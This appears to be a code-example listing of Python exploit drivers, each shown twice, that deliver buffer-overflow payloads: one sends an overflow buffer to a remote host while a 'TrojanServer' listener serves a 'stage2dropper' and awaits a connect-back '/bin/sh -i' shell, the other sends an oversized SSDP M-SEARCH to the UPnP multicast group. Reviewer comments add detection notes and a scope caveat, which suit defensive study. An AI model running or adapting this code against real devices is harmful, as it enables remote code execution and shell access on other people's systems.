コード例 #1
    if search_value.startswith("0x"):
        value=int(search_value,16)
    offset=buf.find_offset(value)
    if(offset < 0):
        print "Couldn't find value %s in the overflow buffer." % search_value
    else:
        print "Found value %s at\noffset: %d" % (search_value,offset)
    exit(0)

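# Send the overflow buffer to the endpoint named on the command line while a
# local connect-back listener is running.
# NOTE(review): TrojanServer, CALLBACK_IP, logger and buf are defined outside
# this listing; the comments about them below are readings of the call sites
# only and should be confirmed against their definitions.
addr = sys.argv[1]       # remote host
port = int(sys.argv[2])  # remote TCP port

files_to_serve = ["./stage2dropper", "./helloworld"]
# Presumably a listener bound to CALLBACK_IP that hands out the listed files
# and accepts a connect-back shell session (connectback_shell=True) - confirm.
# Detection note: if that reading is right, a run is visible as one inbound TCP
# connection to addr:port carrying the oversized payload, followed by an
# outbound connection from that device to CALLBACK_IP; unexpected outbound
# connections from the device are the signal to alert on.
server = TrojanServer(CALLBACK_IP, files_to_serve, connectback_shell=True,
                      startcmd="/bin/sh -i")
pid = server.serve()  # truthy result is treated as "listener started"
time.sleep(1)  # presumably lets the listener finish starting - confirm
if pid:
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((addr, port))
            logger.LOG_INFO("sending exploit.")
            sock.send(str(buf))  # Python 2: str(buf) is the raw byte string
        finally:
            # Release the descriptor on the failure path as well; the original
            # leaked the socket whenever connect() or send() raised.
            sock.close()
        server.wait()
    except Exception as e:
        # A single warning that carries the real error. The original logged
        # two near-identical lines and discarded the exception, and this
        # handler also covers failures raised by server.wait().
        logger.LOG_WARN(
            "Failed to connect. Killing connect-back server. (%s)" % (e,))
        server.shutdown()
else:
    # The original fell through silently when the listener did not start.
    logger.LOG_WARN("Failed to start connect-back server.")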
コード例 #2
    if search_value.startswith("0x"):
        value=int(search_value,16)
    offset=buf.find_offset(value)
    if(offset < 0):
        print "Couldn't find value %s in the overflow buffer." % search_value
    else:
        print "Found value %s at\noffset: %d" % (search_value,offset)
    exit(0)

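# Send the overflow buffer to the endpoint named on the command line while a
# local connect-back listener is running.
# NOTE(review): TrojanServer, CALLBACK_IP, logger and buf are defined outside
# this listing; the comments about them below are readings of the call sites
# only and should be confirmed against their definitions.
addr = sys.argv[1]       # remote host
port = int(sys.argv[2])  # remote TCP port

files_to_serve = ["./stage2dropper", "./helloworld"]
# Presumably a listener bound to CALLBACK_IP that hands out the listed files
# and accepts a connect-back shell session (connectback_shell=True) - confirm.
# Detection note: if that reading is right, a run is visible as one inbound TCP
# connection to addr:port carrying the oversized payload, followed by an
# outbound connection from that device to CALLBACK_IP; unexpected outbound
# connections from the device are the signal to alert on.
server = TrojanServer(CALLBACK_IP, files_to_serve, connectback_shell=True,
                      startcmd="/bin/sh -i")
pid = server.serve()  # truthy result is treated as "listener started"
time.sleep(1)  # presumably lets the listener finish starting - confirm
if pid:
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((addr, port))
            logger.LOG_INFO("sending exploit.")
            sock.send(str(buf))  # Python 2: str(buf) is the raw byte string
        finally:
            # Release the descriptor on the failure path as well; the original
            # leaked the socket whenever connect() or send() raised.
            sock.close()
        server.wait()
    except Exception as e:
        # A single warning that carries the real error. The original logged
        # two near-identical lines and discarded the exception, and this
        # handler also covers failures raised by server.wait().
        logger.LOG_WARN(
            "Failed to connect. Killing connect-back server. (%s)" % (e,))
        server.shutdown()
else:
    # The original fell through silently when the listener did not start.
    logger.LOG_WARN("Failed to start connect-back server.")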
コード例 #3
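# Two modes, selected by the command line:
#   * with an argument: look the value up in the overflow buffer and print its
#     offset; nothing is sent on the network;
#   * without arguments: start the connect-back listener and send the crafted
#     M-SEARCH message.
# NOTE(review): msearch_crash, buffer_overflow_string, connectback_server,
# send_multicast and logger are defined outside this listing.
msearch_string = msearch_crash.MsearchCrash(buffer_overflow_string)

pid = None
if len(sys.argv) > 1:
    search_string = sys.argv[1]
    # Keep the text the user typed for the messages below; after packing,
    # search_string holds raw bytes that do not print readably.
    search_label = search_string
    if search_string.startswith("0x"):
        # A numeric argument is matched as a big-endian unsigned 32-bit value.
        search_string_num = int(search_string, 0)
        search_string = struct.pack(">L", search_string_num)

    offset = buffer_overflow_string.find_offset(search_string)
    if offset < 0:
        print("Couldn't find string %s in the overflow buffer." % search_label)
    else:
        print("Found string %s at\noffset: %d" % (search_label, offset))
    # Lookup mode ends here. The original fell through with pid still None,
    # logged "Failed to start connect-backserver." and exited with status 1
    # even though no server start had been attempted.
    sys.exit(0)

pid = connectback_server.serve()
if not pid:
    logger.LOG_WARN("Failed to start connect-backserver.")
    sys.exit(1)

try:
    logger.LOG_INFO("Sending exploit")
    # 239.255.255.250:1900 is the SSDP (UPnP discovery) multicast group.
    # Scope caveat: a multicast datagram reaches every SSDP listener on the
    # segment, not one chosen host, so the run belongs on an isolated network.
    # Detection note: an M-SEARCH with an oversized field on this group is the
    # on-wire artefact of a run.
    send_multicast("239.255.255.250", 1900, str(msearch_string))
    connectback_server.wait()
except Exception as e:
    print(e)
    connectback_server.shutdown()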
コード例 #4
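# Two modes, selected by the command line:
#   * with an argument: look the value up in the overflow buffer and print its
#     offset; nothing is sent on the network;
#   * without arguments: start the connect-back listener and send the crafted
#     M-SEARCH message.
# NOTE(review): msearch_crash, buffer_overflow_string, connectback_server,
# send_multicast and logger are defined outside this listing.
msearch_string = msearch_crash.MsearchCrash(buffer_overflow_string)

pid = None
if len(sys.argv) > 1:
    search_string = sys.argv[1]
    # Keep the text the user typed for the messages below; after packing,
    # search_string holds raw bytes that do not print readably.
    search_label = search_string
    if search_string.startswith("0x"):
        # A numeric argument is matched as a big-endian unsigned 32-bit value.
        search_string_num = int(search_string, 0)
        search_string = struct.pack(">L", search_string_num)

    offset = buffer_overflow_string.find_offset(search_string)
    if offset < 0:
        print("Couldn't find string %s in the overflow buffer." % search_label)
    else:
        print("Found string %s at\noffset: %d" % (search_label, offset))
    # Lookup mode ends here. The original fell through with pid still None,
    # logged "Failed to start connect-backserver." and exited with status 1
    # even though no server start had been attempted.
    sys.exit(0)

pid = connectback_server.serve()
if not pid:
    logger.LOG_WARN("Failed to start connect-backserver.")
    sys.exit(1)

try:
    logger.LOG_INFO("Sending exploit")
    # 239.255.255.250:1900 is the SSDP (UPnP discovery) multicast group.
    # Scope caveat: a multicast datagram reaches every SSDP listener on the
    # segment, not one chosen host, so the run belongs on an isolated network.
    # Detection note: an M-SEARCH with an oversized field on this group is the
    # on-wire artefact of a run.
    send_multicast("239.255.255.250", 1900, str(msearch_string))
    connectback_server.wait()
except Exception as e:
    print(e)
    connectback_server.shutdown()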